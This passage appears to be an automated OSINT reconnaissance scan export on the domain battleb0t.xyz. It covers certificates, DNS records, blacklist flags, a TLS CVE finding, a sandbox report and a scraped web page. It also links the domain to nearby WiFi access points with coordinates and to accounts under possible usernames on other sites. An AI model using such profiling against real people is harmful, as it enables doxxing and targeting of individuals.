c8:c8:e1:83:f9:b8:7a:33:57:f8:8e:90:08:fd:c7:
e2:e9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
31:FB:31:C7:D3:F3:CF:11:AF:91:FA:E4:71:40:41:2F:C4:66:90:11
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/mFVJO6PGh8g
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/Zn3bDrcK0Gs.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
8f:de:2d:05:92:69:48:3c:56:fc:22:08:a2:35:bd:c8:57:65:
b5:6f:33:0c:aa:bc:76:e8:1d:42:77:47:bc:ae:0e:80:ed:dd:
d3:8e:f7:0f:aa:49:99:2e:fb:bb:2f:e3:ed:b0:fc:04:11:23:
70:ae:f2:d5:ad:55:18:89:fd:c2:f1:f7:ab:64:01:10:ce:86:
6e:5a:5f:19:d1:b4:39:19:cf:7c:c2:bd:e3:c7:5a:bd:91:f4:
86:d0:db:9a:02:e1:5f:ff:08:f2:7f:c9:ca:5d:f9:53:49:db:
4d:e4:6b:a2:d8:53:33:76:e9:c8:7d:9b:a1:37:1c:e1:fd:14:
c0:c4:e2:28:fe:cc:ba:5c:25:d8:86:52:ce:0d:c5:7f:e7:b5:
d9:3e:e1:65:14:17:4f:8c:55:fc:01:58:43:fe:c7:c5:4b:26:
e2:ea:0b:c9:ff:2c:52:b5:ab:00:e9:06:49:51:c2:01:ca:b5:
6a:c4:ae:a2:17:c3:86:ec:ec:a7:72:a4:4e:b6:4e:3e:d9:0b:
df:8f:84:de:6a:96:ce:0d:8d:26:ac:b2:5c:45:1f:a0:e5:df:
88:dd:84:9f:fe:46:1e:e9:a2:91:bb:ae:08:4d:ff:a2:51:db:
43:d0:e5:a3:df:91:dd:52:a9:23:85:54:e1:34:57:f4:c7:f8:
24:6b:63:ba
| battleb0t.xyz |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.68): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx1 (Net ID: 00:02:2D:A8:7E:D5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:36 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 221.30.196.104.bc.googleusercontent.com | 104.196.30.221 |
| 2023-05-12 02:44:09 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| battleb0t.xyz |
| 2023-05-12 02:46:49 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=GB,ST=Greater Manchester,L=Salford,O=Sectigo Limited,CN=Sectigo RSA Domain Validation Secure Server CA | 64.226.81.43 |
| 2023-05-12 02:53:45 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8002::153 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.111): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://fluid.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.219): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DCO (Net ID: 00:0C:41:66:5E:C3) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Greece | expressdryclean.gr |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/Battleb0t | Battleb0t |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Chomikuj.pl (Category: misc)
https://chomikuj.pl/dawidsulej/ | dawidsulej |
| 2023-05-12 03:08:29 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.109.153 |
| 2023-05-12 03:09:39 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 111.48.229.35.bc.googleusercontent.com | 35.229.48.111 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | friday28 (Net ID: 00:06:25:BF:BB:2F) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | U+Net (Net ID: 00:02:A8:81:E3:25) | 50.1188, 8.6843 |
| 2023-05-12 03:11:16 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2a06:98c1:3120::1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:66:AA:84) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:48 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06G1PB5R3RGDWCWXWQ2TAMN
Date: <REDACTED>
Content-Length: 0
| 34.148.97.127 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ikizler (Net ID: 00:12:BF:32:87:51) | 40.2024, 29.0398 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:64:DA:1A) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | logitecgameuser (Net ID: 00:01:8E:15:D4:A7) | 37.780462,-122.390564 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00-duino.github.io |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| funny.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | vapor (Net ID: 00:02:2D:09:FB:FD) | 37.780462,-122.390564 |
| 2023-05-12 02:53:22 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:92:53:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_5.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | studiobleu (Net ID: 00:0C:41:86:C7:5C) | 39.0469, -77.4903 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FOX (Net ID: 00:01:71:0C:5D:4A) | 52.3759, 4.8975 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8003::153 | battleb0t.xyz |
| 2023-05-12 02:45:48 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 02:53:01 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [34.148.97.127]
https://www.virustotal.com/en/ip-address/34.148.97.127/information/ | 34.148.97.127 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pokec (Category: social)
https://pokec.azet.sk/login | login |
| 2023-05-12 02:55:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://anonymousplanet-ng.org/guide.html#how-to-share-files-or-chat-anonymously', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7516:120:WilError_01"\n "SM0:7680:120:WilError_01"\n "Local\\SM0:7680:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:7680:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7516:120:WilError_01"\n "Local\\SM0:7516:304:WilStaging_02"\n "SM0:7516:304:WilStaging_02"\n "SM0:7516:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7516:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7516:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7516:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32" at base 7060000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base 60c0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base 60c0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base 60c0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\IMM32.DLL" at base 9400000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 60c0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 60c0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 60c0000\n "msedge.exe" loaded module "%WINDIR%\\TEMP\\VXOLE64.DLL" at base ff6c0000\n "msedge.exe" loaded module "NTMARTA.DLL" at base 5020000\n "msedge.exe" loaded module "KERNEL32.DLL" at base 7060000\n "msedge.exe" loaded module "COMBASE.DLL" at base 8c60000\n "msedge.exe" loaded module "OLE32.DLL" at base 86c0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 4480000'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"216.239.36.21:443"\n "185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', 